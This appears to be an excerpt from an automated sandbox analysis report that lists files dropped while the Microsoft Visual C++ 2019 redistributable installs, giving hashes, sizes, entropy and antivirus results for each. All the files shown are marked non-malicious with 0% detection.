                                                                        SHA-256:93B2599549721C004A30857A6E105F60CFE3057230109F3B8D1C6CE2C520ADEF
                                                                        SHA-512:936AD912A2219278F490855C68CBAB7C7962CE42D6110603EDFCC5645A7AA8308B3BB84B145E3F75CCC0DBCA62684001D3FDE40484FD593E3B991CCE86EFB3EA
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d......4.........." ...".............................................................!....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.......4........X..................4........l..................4........$...L...L..........4............p...p...........................RSDST9<B{.i.Wc-.gX.,....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ESN.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..`....rsrc$02.... ...T9<B{.i.Wc-.gX.,...I.F.w._U...4........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):79696
                                                                        Entropy (8bit):4.957571682646658
                                                                        Encrypted:false
                                                                        SSDEEP:768:926iNYajZELeWYFmNRYxAaTafCp5eQYZmZUjyyyyyyyyyyyyyyyUGQFUbWTVNeTO:9NuqLeW6A2SCHu0jhFzVRzw
                                                                        MD5:B0924A9F3FF2CED936E94AC2DA338CFA
                                                                        SHA1:AD48A45145FAFBAAF450B5DB1378B2B96598EC51
                                                                        SHA-256:06220647576FDB763B9EFC20581EF8A561654F1E6E60B394937B1D2877DBC011
                                                                        SHA-512:AF647F77351A6D1968585627B84C01E9AB3E6B65CB8985F13F0B8586DF912BCBABEACA0FB93C96D302181BBCBA07A80928C39F68B51C6A517DA4560B197DC661
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...Y............" ...".............................................................S....`A......................................................... ..x...............PO..............p............................................................................rdata..t...........................@..@.rsrc...x.... ......................@..@....Y..........X...............Y..........l...............Y..........$...L...L.......Y..............p...p...........................RSDS.$....b..1#'.......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140FRA.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ....$....b..1#'....E..+.OL)RX.Y..........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):77648
                                                                        Entropy (8bit):4.9589173959336685
                                                                        Encrypted:false
                                                                        SSDEEP:768:hRE6XaCyqbK15M8zwgDGxNIlW3jSCQQQjeqS1hDDg1UWTV8Hkhg9zGDMKvg9zGQ:hnass5M8zwgSxNIlW3GoiTwTzATQz
                                                                        MD5:0B6D7C89EBA8609F9B877CDDB875AB00
                                                                        SHA1:34FA8C4B62BF7E0A12E0C94E9BB8B49F7A78E317
                                                                        SHA-256:B74B0BF88316ADDE2AA8D1455AE9BFA9762D6F7093F8239BEF44D5A802AB2518
                                                                        SHA-512:0BC4A5D5483D4C51CF50254B39107B049B7B92CCE5561456F4524FBD0972C1D85CE4D1F1DEC81772D66D1090D4BFBE4729E0C9004629A760A07C76D66365CE72
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....X............" ..."............................................................S+....`A......................................................... ..X...............PO..............p............................................................................rdata..t...........................@..@.rsrc...X.... ......................@..@.....X..........X................X..........l................X..........$...L...L........X..............p...p...........................RSDS.@..4...5.+.R.V.....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ITA.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ....@..4...5.+.R.V.a...8...P<-.X..........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):58704
                                                                        Entropy (8bit):6.138297075618846
                                                                        Encrypted:false
                                                                        SSDEEP:768:DanVn/7RfJxsr10/eu9RHreDHYMufiC9zuAbK9MufiC9zue:mnp/7RgunIYVzu39Vzue
                                                                        MD5:8778C8D55C6801171CF2D7161D9D2608
                                                                        SHA1:6875E6B9493D678A384379F8425D6C274E32C378
                                                                        SHA-256:D3BD3C71EC44D51A8F341CA43981A2A32B388DF7A2BBD81C996B97CD4C4E1E1D
                                                                        SHA-512:1111A598441F657DD887150C1D9152A971C3728E4A1DC9C85C249A91143C20E918CB9E0902E0647B9260E6CC150360387EFE14602CEAAC5C6DCFCBB56408F494
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....-............" ..."............................................................t.....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.....-..........X................-..........l................-..........$...L...L........-..............p...p...........................RSDS4....iQZ....5pn....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140JPN.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..p....rsrc$02.... ...4....iQZ....5pn..r.s.....O.-..........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):58192
                                                                        Entropy (8bit):6.2590221802837
                                                                        Encrypted:false
                                                                        SSDEEP:768:VTQO54LQTNlwUaHqNA3B2I7Cvq/HfJMufiC9zuOK5eMufiC9zufl:Vr51TNlqqNAx2I7CvqvfJVzutUVzufl
                                                                        MD5:17C5AA7148D32622073DBEB124DD7208
                                                                        SHA1:25DB38CE00E4CFC6D4204730955902D38A8DEDCF
                                                                        SHA-256:4D148066E9D361ECCDB6E3245A55164B9FEA2533431EF28F6B431D6ED9F3CA4C
                                                                        SHA-512:47F03C541FE62815DD1ADCC41C04D5F9CB3C0B9A70825A15E87479F9644E513FBFAAA0675B470BBE68D457140AEEDDB5A0579C0AC44C41AAC75132CC7369D65A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....]............" ...".............................................................Y....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.....]..........X................]..........l................]..........$...L...L........]..............p...p...........................RSDS.......h...^0w......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140KOR.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1...~...rsrc$02.... ..........h...^0w..#....A@R.....]..........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):75600
                                                                        Entropy (8bit):5.490211431615378
                                                                        Encrypted:false
                                                                        SSDEEP:768:/v/gFXOvULiqNWTMHVhtZgFckD9AHkIRmuU9zCHKlRmuU9zhY:f6XOvURhTWckad8zCqPd8zhY
                                                                        MD5:750C7DA20713AC9D54917511B0A25008
                                                                        SHA1:9C65E14D7CD5B76ABBB0BF375EFE14DB25404771
                                                                        SHA-256:E3E959FC260BC6707641645CE84057893F166984FA18324008DB39E4132C5A06
                                                                        SHA-512:C9785A35C024853D6055E8D97754465373D62D486C09F428BCF2E6DF973F360C6991ECC840819CD3C34DB0BD83D42CA28A0DC2C0CF7980B1283B634A517EBDD0
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5658960
                                                                        Entropy (8bit):6.7350057529257
                                                                        Encrypted:false
                                                                        SSDEEP:98304:SPjBNrNGV+cJHdFLOAkGkzdnEVomFHKnP+:ONMYudFLOyomFHKnP+
                                                                        MD5:0F3BCCC38502C5543C02266E6E62B738
                                                                        SHA1:4C5EB318EEEA2C208E6931178D3CC5B1D59C4E2B
                                                                        SHA-256:BC9EB4F2C8A8E9F1AB4CF67B935BBE13E5FE456FAA8B9E1D486EF81C27C4D810
                                                                        SHA-512:DE9758B1EAE1C2F1375B415B44DC2B8C3B65FAFAE9AAAB53DB85341F7C00F9499D9DDA9A80A89A3D4FC7F4F7BFFD335564863D5A2EA7719D59E13F7D1EE4F87A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):96592
                                                                        Entropy (8bit):6.371033376303132
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Gnn+7eH5QzDxoBTYy+Ajw1dSj6tYhuW0swuw4N3P+ucQUCf9XzuiYIFf9Xzuv:G+S2zDxoBTxT6tYhuW0s/NPbcFCf9Xfo
                                                                        MD5:82E66964F91445140EBAD6563A61AFEC
                                                                        SHA1:B981C47029F23EF809837CBD5EB6DD78C895849C
                                                                        SHA-256:3970DF10C373E72BF929D9D07F40564B89106227349B0CD3A68F485B75D639A7
                                                                        SHA-512:0B912F8E510EB0158BA0091DFF73B94D223F86CC1BE1C0DDA28E044EEB1BBF4103B5B74C90BB9D6CFC3B0B72EC95D48B6693042242A68CD2F5CC3041D4C03AF9
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):96592
                                                                        Entropy (8bit):6.367271194012751
                                                                        Encrypted:false
                                                                        SSDEEP:1536:MnKBn5WzzDxSnM5yj6A+JGY0swu6fpXqmLuDhM9nXzuk0lplnXzuk6:pBszDxSnM566A+JGY0sqamaDSX8lX8
                                                                        MD5:386B853F3D5B6A16055C9591BD938F3A
                                                                        SHA1:10A78EF8DC72D010A97BF504B012D0CFE769CFF4
                                                                        SHA-256:F56F5B8208DD2376D4F50F4B3C1689B8DB4D17A4623FF2B8DF71EA9E1721DFF2
                                                                        SHA-512:4BB02FC38884C43E35DFF4019C605A76F5CE1661CA69492CE23D2C13674A0D184786FF17CEEDFACA6653F85CF49B3CDDA9ECB766DE2DFCFA4F72D8273F138475
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):579920
                                                                        Entropy (8bit):6.52239950023068
                                                                        Encrypted:false
                                                                        SSDEEP:12288:LrkOYDWQRan8Rqpp8v4cTbu/nVfKgn+6aFoVmUPyGcNz+QEKZm+jWodEEVGmHHl:L1VmUqcQEKZm+jWodEEk4l
                                                                        MD5:0929E46B1020B372956F204F85E48ED6
                                                                        SHA1:9DC01CF3892406727C8DC7D12AD8855871C9EF09
                                                                        SHA-256:CB3C74D6FCC091F4EB7C67EE5EB5F76C1C973DEA8B1C6B851FCCA62C2A9D8AA8
                                                                        SHA-512:DD28FCA139D316E2CC4D13A6ADFFB7AF6F1A9DC1FC7297976A4D5103FAE44DE555A951B99F7601590B331F6DBB9BFC592D31980135E3858E265064117012C8D5
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):35664
                                                                        Entropy (8bit):6.593060494290354
                                                                        Encrypted:false
                                                                        SSDEEP:384:s1vZLstUQjOoKFYVWcM5gW9EutSt+ed8QtR9z//glxyeHRN7vk58QtR9z//gpjYw:spCtzjOjKGkHUQP9zHK3QP9zK
                                                                        MD5:C385EBC3A83D842489021E48E23BC925
                                                                        SHA1:0A992ABB2E424DA981196EDB280E7821F2033D9F
                                                                        SHA-256:8E49A6D937EE6AC20D949629B54E28CAF01AEF312BC7184063280346B35899E3
                                                                        SHA-512:85CC4C9FBEACDDC934D46D907354C1FE93DC62B1BAD7A6CCDB7C9101E820D01717E863FAB39DD6BC062F38A100F03D49EBE2B3905146BCEDFC6C014703D8C3B3
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):197456
                                                                        Entropy (8bit):6.635988442488691
                                                                        Encrypted:false
                                                                        SSDEEP:3072:emnW8UQ7ORW0cNFSCYzwUT1VUxwO1Mkz1wN6jAUjEgi8H0NpScUuhIW4Wbx:eEVP5FSCYbPUxKkEWShIo1
                                                                        MD5:4B27F209925C247252BABEFF90D6CD2A
                                                                        SHA1:709DC2E8A03A9F261C64ADF3F1C0839DE62DDF52
                                                                        SHA-256:25305353C51AC72F4646BD549493BECDBD6C997605F70C937E72CAD3F962182D
                                                                        SHA-512:30E8EF20EC13ABE50A13319159EB2BA1EBB117E1E4C438E24DE48331ACAB34D8AF3531E051CD93597EB5BEDE0AF81AE223A06DAA072FF226D79240FFFF68B7A6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):50000
                                                                        Entropy (8bit):6.6288466564529065
                                                                        Encrypted:false
                                                                        SSDEEP:768:yHjBCiRZC7XVLgKaA3XO6NVOHG3l9zwKI3l9zE:vlLgKp3XOeVcGHzXIHzE
                                                                        MD5:C79B59C4522833628C19F9AE74BDC054
                                                                        SHA1:51F4EDB0B8D19DBBAE68B0FEEDCB5B30DEDA3B44
                                                                        SHA-256:6816A8212A20072E5D34D56D9BDC3C8FD8EE0759343A7936D237622F30E2508A
                                                                        SHA-512:9487AFC32F35F1D3EFA803525B3CB0B6C5722E4DAFC22ECC2BE7CD69C83A82F42746A6F959419BE4BAA6A5C2D323812E5F4E0AA6C43D41EF69DE742F18C15999
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):31568
                                                                        Entropy (8bit):6.784944828286826
                                                                        Encrypted:false
                                                                        SSDEEP:384:fnhXaOURZWiuEWautSt+ep8QtR9z//g6IDyeHRN7mcQ8QtR9z//gv3EH:fkOTYH4QP9zJKJQP9zbH
                                                                        MD5:CBE84FF1C31A46517CEE75D2F0A131C9
                                                                        SHA1:56FA7AFCE430D59F9B5B8C3A284D2214EA5A0DF6
                                                                        SHA-256:478E7A1EEC4E4D80A2600DA355A0BD741505CD6BD33AE8E8B1604B66FF94711B
                                                                        SHA-512:5E5B5453CDF00D7E07816226CB78431BE58303457A88A1C60CEC6A1DBD0D25F72C6917312D8686AE5C40919FAE4C7EE80B62A309ED44B154F57D73EDD91E65F1
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):414544
                                                                        Entropy (8bit):6.39872237716585
                                                                        Encrypted:false
                                                                        SSDEEP:6144:nmU5qgKJWj8R7V6JozBVgNSp8iC7PGirS7HLrOhMcvyUwUZOqz0iTx9a9T:maAJWj8xV6GdyNSp8iC7PGGS7POkBP
                                                                        MD5:7DBCAF6B03B97163731F391395406C4E
                                                                        SHA1:340CB672F4A80EC76D8B2E758E4E9880C66E8A3D
                                                                        SHA-256:33BFAF7EC048215B7CE55F61444A5361309BA01B73AD40C192FD647A676E63C3
                                                                        SHA-512:AF4679D5F39768DC8628F785FA19855E73D24710302861C51C9A115BFF97B4B4A17B01AE2E21ECC469528382B13805E5687459D8C86341C8B98DBC234C8AA880
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):345936
                                                                        Entropy (8bit):6.045245777392109
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MXkEvKJuQW9sR2Dr8NZrK6nVYDPE+kaCih8vev:ekEwhW9shn+Dc8hcI
                                                                        MD5:A767DDF1EAE2C38A59312D304C803BC0
                                                                        SHA1:5204A25FE8AF8C21DE3305966B6BB17043656168
                                                                        SHA-256:D7731A1DF856D0A19344FD0B80DADD4E4BE6B6136236FBA6543BB66C1F015E81
                                                                        SHA-512:4F892A698ECFEF06897747E47035768FB4F132B41C60FA26430CBC1F0C3608DE744FFF27B2CAE46114C1CE72BC6E58E3C4D1F8350D414AE16958CE21F89C1A9F
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):191824
                                                                        Entropy (8bit):6.448531042380911
                                                                        Encrypted:false
                                                                        SSDEEP:3072:1BFc8DO8nun2cxR4nGP6A4zWBxgXkNe0IOdPctDksog9j+r/A/U:3Cp8nu1xRoVzACUg814a/H
                                                                        MD5:9312D1B8DF74830B285820276ECD5DDA
                                                                        SHA1:4CB1CBE8003EE4CD352AC37C44E958F7DD8CDECA
                                                                        SHA-256:CB721F775CDEE730D9D69EBD9E723C05A99EE1805F8D23A52A74FC015AA3D965
                                                                        SHA-512:C49415EBDE6B8B586D6CBDAD2CB4D8CDBC245CB681759918D37025652BAD288406AC9168C0C549C4ED9060AD5C5EBA025A4691014783B8CD38CE5A7B901DE9AE
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):109392
                                                                        Entropy (8bit):6.643764685776923
                                                                        Encrypted:false
                                                                        SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                                        MD5:870FEA4E961E2FBD00110D3783E529BE
                                                                        SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                                        SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                                        SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):49488
                                                                        Entropy (8bit):6.652691609629867
                                                                        Encrypted:false
                                                                        SSDEEP:768:8EgYXUcHJcUJSDW/tfxL1qBS3hO6nb/TEHEXi9zufUKQXi9zug:8vGS8fZ1eUpreA+zuTc+zug
                                                                        MD5:BBA9680BC310D8D25E97B12463196C92
                                                                        SHA1:9A480C0CF9D377A4CAEDD4EA60E90FA79001F03A
                                                                        SHA-256:E0B66601CC28ECB171C3D4B7AC690C667F47DA6B6183BFF80604C84C00D265AB
                                                                        SHA-512:1575C786AC3324B17057255488DA5F0BC13AD943AC9383656BAF98DB64D4EC6E453230DE4CD26B535CE7E8B7D41A9F2D3F569A0EFF5A84AEB1C2F9D6E3429739
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):650568
                                                                        Entropy (8bit):7.222670928617801
                                                                        Encrypted:false
                                                                        SSDEEP:12288:inMwHskY7gjcjhVIEhqgM7bWvcsi6aVKrIysU40vy3W/ceKSHMsiFyY6XN2:sMysZgjS1hqgSC/izGfHjymk4HM5yJ
                                                                        MD5:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        SHA1:8F4D4A1AFA9FD985C67642213B3E7CCF415591DA
                                                                        SHA-256:5A61F9775032457DB28EDD41F98F08C874E759F344EA8475C9AC8ABBBA68DE12
                                                                        SHA-512:FF8B87E7746ECF19A150874DEDD6EA4C51C76CFC291C5A80D9E5073A9BBBB2BD6ED7D10425B083578DC8D28D0D905E379FA3F919A60979E5B5C44EBC0AC613E6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18127
                                                                        Entropy (8bit):4.036737741619669
                                                                        Encrypted:false
                                                                        SSDEEP:192:xaz+aCQbjdBCLCgfvtfLEmmVxJzLKLIW7cBFCoSM0fvJ93eyryH1MqG1xcRY/c5f:seh/IMHexG4q2
                                                                        MD5:B7F65A3A169484D21FA075CCA79083ED
                                                                        SHA1:5DBFA18928529A798FF84C14FD333CB08B3377C0
                                                                        SHA-256:32585B93E69272B6D42DAC718E04D954769FE31AC9217C6431510E9EEAD78C49
                                                                        SHA-512:EDA2F946C2E35464E4272B1C3E4A8DC5F17093C05DAB9A685DBEFD5A870B9D872D8A1645ED6F5B9A72BBB2A59D22DFA58FBF420F6440278CCBE07B6D0555C283
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fb\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a3\'ac\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\'bb\'f2\'b1\'be\'dc\'9b\'f3\'77\'d6\'ae\'b8\'fc\'d0\'c2\'a3
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):6.163758160900388
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
                                                                        MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                        SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                        SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                        SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13053
                                                                        Entropy (8bit):5.125552901367032
                                                                        Encrypted:false
                                                                        SSDEEP:192:TKwfs7OUpXLa5HEXQwNCNvZSjotXxiwH++3kamdEj6ZDbugDHgbGNlv6NbrYGY9x:Lfs7c5DRH0aHmJGpafU0AliwGra2
                                                                        MD5:B408556A89FCE3B47CD61302ECA64AC9
                                                                        SHA1:AAC1CDAF085162EFF5EAABF562452C93B73370CB
                                                                        SHA-256:21DDCBB0B0860E15FF9294CBB3C4E25B1FE48619210B8A1FDEC90BDCDC8C04BC
                                                                        SHA-512:BDE33918E68388C60750C964CDC213EC069CE1F6430C2AA7CF1626E6785C7C865094E59420D00026918E04B9B8D19FA22AC440F851ADC360759977676F8891E7
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z\~jej\f0\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte) a\~v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI TYTO
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3333
                                                                        Entropy (8bit):5.370651462060085
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
                                                                        MD5:16343005D29EC431891B02F048C7F581
                                                                        SHA1:85A14C40C482D9351271F6119D272D19407C3CE9
